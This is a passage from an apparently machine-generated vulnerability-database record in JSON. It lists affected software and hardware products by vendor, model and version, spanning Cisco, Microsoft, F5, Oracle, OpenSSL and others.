"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1"
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1"
},
{
"_id": null,
"model": "enterprise linux workstation supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "access manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "novell",
"version": "3.1"
},
{
"_id": null,
"model": "windows vista home premium sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.24"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.2.0"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.0"
},
{
"_id": null,
"model": "sdk for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "integrated lights-out",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "21.16"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.6"
},
{
"_id": null,
"model": "windows vista home premium 64-bit edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "0"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.0"
},
{
"_id": null,
"model": "wanjet",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.2.8"
},
{
"_id": null,
"model": "systems insight manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.0"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.13"
},
{
"_id": null,
"model": "windows terminal services sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.5.2"
},
{
"_id": null,
"model": "coat systems packetshaper",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "100000"
},
{
"_id": null,
"model": "openvms secure web server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3-1"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6.2"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2.178.0"
},
{
"_id": null,
"model": "windows server enterprise edition itanium sp1 beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20031"
},
{
"_id": null,
"model": "windows server sp2 beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "unified communication manager business edition",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0.x"
},
{
"_id": null,
"model": "appliance platform linux service",
"scope": "eq",
"trust": 0.3,
"vendor": "rpath",
"version": "2"
},
{
"_id": null,
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "nx-os 4.0 n2",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3.1"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)"
},
{
"_id": null,
"model": "oracle10g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.3"
},
{
"_id": null,
"model": "windows datacenter server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "windows xp professional edition sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "x64"
},
{
"_id": null,
"model": "2.1-rc9",
"scope": null,
"trust": 0.3,
"vendor": "openvpn",
"version": null
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "34009.2.3"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "3.1"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10009.2.3"
},
{
"_id": null,
"model": "messaging application server mm",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"_id": null,
"model": "bigip application security manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.3"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "windows server for 32-bit systems sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "beta11",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0"
},
{
"_id": null,
"model": "telepresence recording server",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "windows vista home premium",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.2.3"
},
{
"_id": null,
"model": "enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"_id": null,
"model": "moblin",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "2.0"
},
{
"_id": null,
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "1.2"
},
{
"_id": null,
"model": "java system web server sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.3"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.3"
},
{
"_id": null,
"model": "opensolaris build snv 122",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3.2"
},
{
"_id": null,
"model": "wireless lan control m",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.38"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.4.0"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"_id": null,
"model": "opensolaris build snv 109",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(4)"
},
{
"_id": null,
"model": "weblogic server sp7",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.4"
},
{
"_id": null,
"model": "csm 4.2.3a",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.11"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.2"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.3"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "unified ip phone",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7960"
},
{
"_id": null,
"model": "windows datacenter server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(2)16"
},
{
"_id": null,
"model": "pfsense 1.2-rc3",
"scope": null,
"trust": 0.3,
"vendor": "bsdperimeter",
"version": null
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3.1"
},
{
"_id": null,
"model": "access manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "novell",
"version": "3.1"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"_id": null,
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"_id": null,
"model": "windows terminal services",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "linux enterprise java sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "jre 1.5.0 08",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "3.1"
},
{
"_id": null,
"model": "aura conferencing",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "coat systems proxysg 8100-c",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "0"
},
{
"_id": null,
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.40.3"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "6.1"
},
{
"_id": null,
"model": "opensolaris build snv 38",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "unified communications manager sr2b",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.52"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "12.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.15"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(3)10"
},
{
"_id": null,
"model": "meeting exchange recording server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "-0"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.1"
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2"
},
{
"_id": null,
"model": "pfsense",
"scope": "eq",
"trust": 0.3,
"vendor": "bsdperimeter",
"version": "1.2.2"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0(2)"
},
{
"_id": null,
"model": "cosminexus developer",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "5"
},
{
"_id": null,
"model": "syslog-ng premium edition",
"scope": "eq",
"trust": 0.3,
"vendor": "balabit",
"version": "3.0.5"
},
{
"_id": null,
"model": "desktop extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7.3.7"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.639"
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.3.2.11"
},
{
"_id": null,
"model": "ucosminexus developer light",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.7"
},
{
"_id": null,
"model": "windows server web edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.3"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "16009.2.5"
},
{
"_id": null,
"model": "intuity audix lx sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.3.3"
},
{
"_id": null,
"model": "wireless control system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.100.0"
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.3.3.0"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "16009.4.5"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1.79"
},
{
"_id": null,
"model": "ucosminexus application server enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7"
},
{
"_id": null,
"model": "unified ip phone 7906g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.2"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.18"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(8)"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)24"
},
{
"_id": null,
"model": "opensolaris build snv 58",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "systems insight manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "4.2"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.7.1"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.3"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.2"
},
{
"_id": null,
"model": "application velocity system 3180a",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.3.728"
},
{
"_id": null,
"model": "unified ip phone sccp",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.3(15)"
},
{
"_id": null,
"model": "ip communicator",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "ucosminexus developer professional",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.7"
},
{
"_id": null,
"model": "bigip application security manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "5.2"
},
{
"_id": null,
"model": "http server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "seamonkey",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.4"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.5"
},
{
"_id": null,
"model": "windows server terminal services",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20030"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.54"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2)"
},
{
"_id": null,
"model": "software opera web browser beta",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "83"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.6.2"
},
{
"_id": null,
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "windows server standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "7.0-release-p11",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "3.3.1"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "windows vista home premium 64-bit edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "nx-os 4.1 n2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "arubaos 2.4.8.0-fips",
"scope": null,
"trust": 0.3,
"vendor": "arubanetworks",
"version": null
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "opensolaris build snv 91",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)16"
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "7.5.1"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.4"
},
{
"_id": null,
"model": "application networking manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2"
},
{
"_id": null,
"model": "opensolaris build snv 101",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.4"
},
{
"_id": null,
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5"
},
{
"_id": null,
"model": "oracle10g personal edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.5"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.6.5"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(2)17"
},
{
"_id": null,
"model": "project proftpd 1.3.2c",
"scope": "ne",
"trust": 0.3,
"vendor": "proftpd",
"version": null
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "3.2"
},
{
"_id": null,
"model": "java system web server sp5",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.659"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.4.5"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "fwsm for cisco catalyst series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6500/76001.1(3.17)"
},
{
"_id": null,
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.2"
},
{
"_id": null,
"model": "bigip global traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.2.2"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "onboard administrator",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "3.21"
},
{
"_id": null,
"model": "access control server",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "web server r1",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.1"
},
{
"_id": null,
"model": "windows server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "unified ip phone sccp",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2(17)"
},
{
"_id": null,
"model": "linux m68k",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "6.4-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "wireless lan controllers",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.112.0"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.14"
},
{
"_id": null,
"model": "wireless control system software",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0"
},
{
"_id": null,
"model": "weblogic server mp2",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.4"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.3.3"
},
{
"_id": null,
"model": "ucosminexus client",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "5.2.4.3"
},
{
"_id": null,
"model": "opensolaris build snv 54",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.3.2.18"
},
{
"_id": null,
"model": "opensolaris build snv 93",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows server datacenter edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.5"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.5"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6.4"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.2"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.3"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.0"
},
{
"_id": null,
"model": "project openssl b",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "java system application server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.2"
},
{
"_id": null,
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.42.7"
},
{
"_id": null,
"model": "network analysis module 4.1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "ace appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "jdk 01",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2)70"
},
{
"_id": null,
"model": "messaging storage server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.4.0"
},
{
"_id": null,
"model": "java system web server plugin",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "7.00"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.64"
},
{
"_id": null,
"model": "project openssl k",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "java system web server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "windows xp 64-bit edition",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "oracle10g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.0.5"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0.4"
},
{
"_id": null,
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.3"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"_id": null,
"model": "java system web server sp7",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "css11500 content services switch",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.4"
},
{
"_id": null,
"model": "matrixssl",
"scope": "eq",
"trust": 0.3,
"vendor": "matrixssl",
"version": "1.1"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.7"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.13"
},
{
"_id": null,
"model": "wireless control system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
